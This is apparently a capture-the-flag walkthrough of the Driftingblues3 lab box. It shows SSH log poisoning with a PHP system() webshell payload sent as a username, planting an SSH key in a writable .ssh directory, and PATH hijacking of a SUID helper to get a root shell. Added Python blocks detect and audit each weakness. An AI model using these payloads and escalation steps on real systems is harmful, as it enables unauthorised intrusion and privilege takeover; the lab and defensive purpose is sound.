
HMV-Driftingblues3

HMV-Driftingblues3 box walkthrough

This box was interesting; I learned an SSH log injection technique from it.

Port scan

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.80.81
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-19 23:04 CST
Nmap scan report for bogon (192.168.80.81)
Host is up (0.013s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/eventadmins
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: C8:21:58:16:CF:C4 (Intel Corporate)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 12.87 ms bogon (192.168.80.81)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.02 seconds

As usual, only ports 22 and 80 are open.

Web enumeration


The home page looks like this (screenshot not preserved), with nothing useful on it at all.
Next, a directory scan.

┌──(root㉿kakeru)-[~/tmp]
└─# dirsearch -u 192.168.80.81
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/tmp/reports/_192.168.80.81/_25-03-19_23-05-25.txt

Target: http://192.168.80.81/

[23:05:25] Starting:
[23:05:26] 403 - 278B - /.ht_wsr.txt
[23:05:26] 403 - 278B - /.htaccess.bak1
[23:05:26] 403 - 278B - /.htaccess.orig
[23:05:26] 403 - 278B - /.htaccess.sample
[23:05:26] 403 - 278B - /.htaccess_orig
[23:05:26] 403 - 278B - /.htaccess.save
[23:05:26] 403 - 278B - /.htaccess_extra
[23:05:26] 403 - 278B - /.htaccess_sc
[23:05:26] 403 - 278B - /.htaccessBAK
[23:05:26] 403 - 278B - /.htaccessOLD2
[23:05:26] 403 - 278B - /.htaccessOLD
[23:05:26] 403 - 278B - /.html
[23:05:26] 403 - 278B - /.htm
[23:05:26] 403 - 278B - /.htpasswds
[23:05:26] 403 - 278B - /.httr-oauth
[23:05:26] 403 - 278B - /.htpasswd_test
[23:05:27] 403 - 278B - /.php
[23:05:34] 301 - 315B - /drupal -> http://192.168.80.81/drupal/
[23:05:36] 200 - 11B - /Makefile
[23:05:36] 200 - 11B - /MANIFEST.MF
[23:05:38] 301 - 319B - /phpmyadmin -> http://192.168.80.81/phpmyadmin/
[23:05:38] 200 - 28B - /phpmyadmin/
[23:05:39] 301 - 316B - /privacy -> http://192.168.80.81/privacy/
[23:05:39] 200 - 37B - /robots.txt
[23:05:39] 200 - 25B - /secret/
[23:05:39] 301 - 315B - /secret -> http://192.168.80.81/secret/
[23:05:39] 403 - 278B - /server-status/
[23:05:39] 403 - 278B - /server-status
[23:05:43] 200 - 458B - /wp-admin/
[23:05:43] 301 - 317B - /wp-admin -> http://192.168.80.81/wp-admin/

Task Completed

The scan turns up several accessible directories; after probing them, robots.txt turns out to contain the useful lead.

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.80.81/robots.txt
User-agent: *
Disallow: /eventadmins
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.80.81/eventadmins
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.80.81/eventadmins/">here</a>.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.80.81 Port 80</address>
</body></html>

man there's a problem with ssh

john said "it's poisonous!!! stay away!!!"

idk if he's mentally challenged

please find and fix it

also check /littlequeenofspades.html

your buddy, buddyG

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.80.81//littlequeenofspades.html
<!DOCTYPE html>
<html>
<body>
<p>Now, she is a little queen of spades, and the men will not let her be </p>
<p>Mmmm, she is the little queen of spades, and the men will not let her be </p>
<p>Everytime she makes a spread, hoo fair brown, cold chill just runs all over me </p>
<p>I'm gon' get me a gamblin' woman, if the last thing that I do </p>
<p>Eee, gon' get me a gamblin' woman, if it's the last thing that I do </p>
<p>Well, a man don't need a woman, ooh fair brown, that he got to give all his money to </p>
<p>Everybody say she got a mojo, now she's been usin' that stuff </p>
<p>Mmmm, mmmm, 'verybody says she got a mojo, 'cause she been usin' that stuff </p>
<p>But she got a way trimmin' down, hoo fair brown, and I mean it's most too tough </p>
<p>Now, little girl, since I am the king, baby, and you is a queen </p>
<p>Ooo eee, since I am the king baby, and you is a queen </p>
<p>Le's us put our heads together, hoo fair brown, then we can make our money green </p>
<p style="color:white">aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==</p>
</html>
┌──(root㉿kakeru)-[~/tmp]
└─# echo aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ== | base64 -d
intruder? L2FkbWluc2ZpeGl0LnBocA==
┌──(root㉿kakeru)-[~/tmp]
└─# echo L2FkbWluc2ZpeGl0LnBocA== | base64 -d
/adminsfixit.php

The adminsfixit.php file displays the SSH log file.
Before this I had also tried brute-forcing SSH with hydra using the usernames seen so far, but SSH here does not accept password logins.
I was stuck here for a long time and did not know how to exploit it. At first I assumed there might be a backdoor and scanned with wfuzz; every request made new characters show up in the log, and the log also showed that root has a cron job, but that was no use either.
From a writeup I learned the intended path is SSH log injection: since the log is rendered by a PHP file, PHP code can be injected directly. Note that you only get one attempt; if the payload is written wrong, the box is ruined.

┌──(root㉿kakeru)-[~/tmp]
└─# ssh '<?php system($_GET["a"]); ?>'@192.168.80.81
remote username contains invalid characters

Writing it directly like this does not work, so I used the auxiliary/scanner/ssh/ssh_login module in msf, which was also new to me: our own ssh client refuses to connect with that username, so a different way of logging in is needed.

msf6 auxiliary(scanner/ssh/ssh_login) > set rhost 192.168.80.81
rhost => 192.168.80.81
msf6 auxiliary(scanner/ssh/ssh_login) > set rport 22
rport => 22
msf6 auxiliary(scanner/ssh/ssh_login) > set username <?php system($_GET['a']);?>
username => <?php system($_GET[a]);?>
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 192.168.80.81:22 - Starting bruteforce
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
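The injection works because sshd writes the attempted username into the log verbatim (the client-side check that rejected the payload above is only in the ssh client), and the PHP page then treats the log as code rather than data. The following is an added example, not code from the original post or from the box: a small detector that parses constructed auth.log lines in OpenSSH's format, flags "Invalid user" entries whose username is not a plausible account name, and shows how a log viewer should render such a line (escaped, as text) so that injected tags are never interpreted. The username allow-list is an assumption based on Debian's default account-name policy; adjust it to your site.

```python
import re
from html import escape

# Constructed sample auth.log lines in OpenSSH's format (not taken from the box).
# Line 3 carries the injected username; the others are ordinary activity.
SAMPLE_AUTH_LOG = """\
Mar 19 23:10:01 driftingblues sshd[1201]: Invalid user robertj from 192.168.80.12 port 50122
Mar 19 23:10:02 driftingblues sshd[1201]: Connection closed by invalid user robertj 192.168.80.12 port 50122 [preauth]
Mar 19 23:11:15 driftingblues sshd[1207]: Invalid user <?php system($_GET['a']); ?> from 192.168.80.12 port 50130
Mar 19 23:12:40 driftingblues sshd[1213]: Accepted publickey for robertj from 192.168.80.12 port 50140 ssh2
"""

# sshd's "Invalid user" message: the username is whatever the client sent.
INVALID_USER = re.compile(r"Invalid user (?P<user>.*?) from (?P<ip>\S+) port (?P<port>\d+)")

# Assumption: Debian-style account names (lowercase, digits, '_' and '-', max 32 chars).
VALID_USERNAME = re.compile(r"[a-z_][a-z0-9_-]{0,31}")

# Substrings that have no business in an account name and point at code injection
# into whatever later renders the log (PHP tags, script tags, template syntax).
MARKERS = ("<?", "<script", "${", "`")


def is_suspicious_username(user):
    """True if the logged username contains injection markers or breaks the naming policy."""
    if any(marker in user for marker in MARKERS):
        return True
    return VALID_USERNAME.fullmatch(user) is None


def find_log_injection(text):
    """Scan auth.log text and return one finding per suspicious 'Invalid user' line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = INVALID_USER.search(line)
        if match and is_suspicious_username(match.group("user")):
            findings.append({
                "line": lineno,
                "ip": match.group("ip"),
                "port": int(match.group("port")),
                "user": match.group("user"),
            })
    return findings


def safe_render(line):
    """How a log viewer should emit a log line: HTML-escaped text, never included as code."""
    return "<pre>" + escape(line, quote=True) + "</pre>"


if __name__ == "__main__":
    for hit in find_log_injection(SAMPLE_AUTH_LOG):
        print(f"line {hit['line']}: suspicious username from {hit['ip']}:{hit['port']} -> {hit['user']!r}")
    print(safe_render(SAMPLE_AUTH_LOG.splitlines()[2]))
```

The same rule applies to every log a web application displays: the injection point in this box is the SSH username, but web server access logs (User-Agent, request path) and mail logs offer the same trick, and the fix is identical, treat log contents as untrusted text and never pass the file through `include` or `eval`.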

After that a reverse shell can be obtained.

Privilege escalation

There are two home directories, lost+found and robertj; the first cannot be entered.
Looking at robertj's home directory shows that the .ssh directory is writable.

www-data@driftingblues:/home/robertj$ ls -al
total 16
drwxr-xr-x 3 robertj robertj 4096 Jan 7 2021 .
drwxr-xr-x 4 root root 4096 Jan 4 2021 ..
drwx---rwx 2 robertj robertj 4096 Jan 4 2021 .ssh
-r-x------ 1 robertj robertj 33 Jan 7 2021 user.txt

So write a public key into authorized_keys.

www-data@driftingblues:/home/robertj/.ssh$ cat authorized_key 
ssh-rsa [public key removed] root@kakeru
www-data@driftingblues:/home/robertj/.ssh$ mv authorized_key authorized_keys
┌──(root㉿kakeru)-[~/tmp]
└─# ssh robertj@192.168.80.81
Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Mar 19 10:28:05 2025 from 192.168.80.12
robertj@driftingblues:~$
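The permission mode of that .ssh directory, drwx---rwx, is world-writable, which is exactly what sshd's StrictModes option (on by default) is meant to refuse: with StrictModes enabled, sshd ignores an authorized_keys file whose directory or home is writable by group or others, so this key drop only worked because the box had relaxed that check. The following is an added example, not part of the original post: an audit function that applies the same ownership and write-bit checks to a home directory, its .ssh directory and authorized_keys, and a demo that reproduces the broken mode in a temporary directory and then the corrected one. The temporary directory layout and the expected-uid rule (owner must be the account or root) are assumptions for the example.

```python
import os
import stat
import tempfile

# Write permission for group or others is what sshd's StrictModes rejects.
WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH


def check_path_mode(path, expected_uid):
    """Return findings for one path: wrong owner, or group/world-writable mode."""
    st = os.lstat(path)
    findings = []
    if st.st_uid not in (expected_uid, 0):  # assumption: the account itself or root
        findings.append(f"{path}: owned by uid {st.st_uid}, expected {expected_uid} or root")
    if st.st_mode & WRITABLE_BY_OTHERS:
        findings.append(f"{path}: mode {stat.filemode(st.st_mode)} is group/world-writable")
    return findings


def audit_ssh_dir(home, expected_uid):
    """Check home, home/.ssh and home/.ssh/authorized_keys the way StrictModes does."""
    findings = check_path_mode(home, expected_uid)
    ssh_dir = os.path.join(home, ".ssh")
    if os.path.isdir(ssh_dir):
        findings += check_path_mode(ssh_dir, expected_uid)
        authorized_keys = os.path.join(ssh_dir, "authorized_keys")
        if os.path.isfile(authorized_keys):
            findings += check_path_mode(authorized_keys, expected_uid)
    return findings


def demo():
    """Recreate the box's drwx---rwx .ssh directory, audit it, fix it, audit again."""
    with tempfile.TemporaryDirectory() as tmp:
        home = os.path.join(tmp, "robertj")      # constructed home directory
        os.mkdir(home, 0o755)
        ssh_dir = os.path.join(home, ".ssh")
        os.mkdir(ssh_dir)
        os.chmod(ssh_dir, 0o707)                 # drwx---rwx, as seen on the box
        authorized_keys = os.path.join(ssh_dir, "authorized_keys")
        with open(authorized_keys, "w") as f:
            f.write("ssh-ed25519 AAAA[constructed-placeholder-key] user@example\n")
        os.chmod(authorized_keys, 0o644)

        before = audit_ssh_dir(home, os.getuid())
        os.chmod(ssh_dir, 0o700)                 # the standard fix: drwx------
        after = audit_ssh_dir(home, os.getuid())
        return before, after


if __name__ == "__main__":
    before, after = demo()
    print("before fix:", before or "clean")
    print("after fix: ", after or "clean")
```

Run the audit across /home on a host you manage and every finding is either an account whose keys can be planted by any local user, or one where sshd is silently ignoring the file; both are worth fixing before an attacker finds them.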

Upload linpeas.sh and run it; the scan finds a file with the SGID bit set.

[+] SGID
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root mail 19K Dec 3 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root tty 15K May 4 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 31K Jul 27 2018 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 71K Jul 27 2018 /usr/bin/chage
-rwxr-sr-x 1 root tty 35K Jan 10 2019 /usr/bin/wall
-rwxr-sr-x 1 root shadow 39K Feb 14 2019 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root crontab 43K Oct 11 2019 /usr/bin/crontab
-rwxr-sr-x 1 root ssh 315K Jan 31 2020 /usr/bin/ssh-agent
-r-sr-s--- 1 root operators 17K Jan 4 2021 /usr/bin/getinfo

robertj@driftingblues:/tmp$ id
uid=1000(robertj) gid=1000(robertj) groups=1000(robertj),1001(operators)

Our current user is in the operators group, so pull the binary back locally and look at it in IDA.

int __cdecl main(int argc, const char **argv, const char **envp)
{
    setuid(0);
    puts("###################\nip address\n###################\n");
    system("ip a");
    puts("###################\nhosts\n###################\n");
    system("cat /etc/hosts");
    puts("###################\nos info\n###################\n");
    system("uname -a");
    return 0;
}

So it runs three commands, ip a, cat /etc/hosts and uname -a, each by bare name. Because this file is SGID, we take the environment-hijacking approach.

robertj@driftingblues:/tmp$ export PATH=$PWD:$PATH
robertj@driftingblues:/tmp$ which ip
/tmp/ip
robertj@driftingblues:/tmp$ /usr/bin/getinfo
###################
ip address
###################

###################
hosts
###################

127.0.0.1 localhost
127.0.1.1 driftingblues

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
###################
os info
###################

Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
robertj@driftingblues:/tmp$ bash -p
bash-5.0# id
uid=1000(robertj) gid=1000(robertj) euid=0(root) egid=0(root) groups=0(root),1000(robertj),1001(operators)
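The root cause is that system("ip a") hands the string to /bin/sh, which resolves a bare command name through the PATH inherited from whoever ran the privileged binary; prepending a writable directory is all it takes. The following is an added example, not code from the post or the box: a resolver that walks a PATH value the way the shell does, an audit that reports which of getinfo's three commands would be picked up from a directory the current user can write, and a demo that reproduces the export PATH=$PWD:$PATH trick in a temporary directory and compares it with a fixed trusted path. The trusted-path value and the command list are assumptions for the example; the hardening it implies for the binary is to call the commands by absolute path or reset PATH before system().

```python
import os
import stat
import tempfile

# The bare command names getinfo runs via system(); the caller's PATH picks the file.
GETINFO_COMMANDS = ("ip", "cat", "uname")

# Assumption: a fixed search path a privileged helper should use instead of the
# inherited one (Debian-style layout).
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"

EXEC_BITS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH


def resolve(cmd, path_env):
    """Return the first regular, executable file named cmd along path_env, like /bin/sh would."""
    for directory in path_env.split(os.pathsep):
        if directory == "":
            directory = os.curdir   # an empty PATH entry means the current directory
        candidate = os.path.join(directory, cmd)
        try:
            st = os.stat(candidate)
        except OSError:
            continue
        if stat.S_ISREG(st.st_mode) and st.st_mode & EXEC_BITS:
            return candidate
    return None


def audit_path(path_env, commands):
    """Map each command to (resolved file, hijackable) where hijackable means the
    file or its directory is writable by the user running this audit."""
    report = {}
    for cmd in commands:
        target = resolve(cmd, path_env)
        hijackable = False
        if target is not None:
            hijackable = os.access(os.path.dirname(target), os.W_OK) or os.access(target, os.W_OK)
        report[cmd] = (target, hijackable)
    return report


def demo():
    """Plant a fake 'ip' in a writable directory and compare inherited vs. trusted PATH."""
    with tempfile.TemporaryDirectory() as tmp:
        planted = os.path.join(tmp, "ip")          # constructed, stands in for /tmp/ip
        with open(planted, "w") as f:
            f.write("#!/bin/sh\necho 'this is not the real ip'\n")
        os.chmod(planted, 0o755)

        inherited_env = f"{tmp}{os.pathsep}{TRUSTED_PATH}"   # mirrors export PATH=$PWD:$PATH
        with_inherited = audit_path(inherited_env, GETINFO_COMMANDS)
        with_trusted = audit_path(TRUSTED_PATH, GETINFO_COMMANDS)
        return tmp, with_inherited, with_trusted


if __name__ == "__main__":
    tmp, inherited, trusted = demo()
    for cmd in GETINFO_COMMANDS:
        print(f"{cmd:6} inherited PATH -> {inherited[cmd]}   trusted PATH -> {trusted[cmd]}")
```

The same audit is useful in the other direction on a host you defend: run it as an unprivileged account against the PATH that cron jobs, sudo rules or setuid helpers actually see, and any command that resolves to a writable location is a finding.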

pwned!

Summary

  • Learned SSH log injection; other log injections work on the same principle, and here the username is the injection point.
  • For PHP files, besides looking for backdoors, think about whether code can be inserted into them.
  • For privilege escalation, chmod +x /bin/bash and bash -p; an environment variable was used to make the executed command resolve to one in the current directory.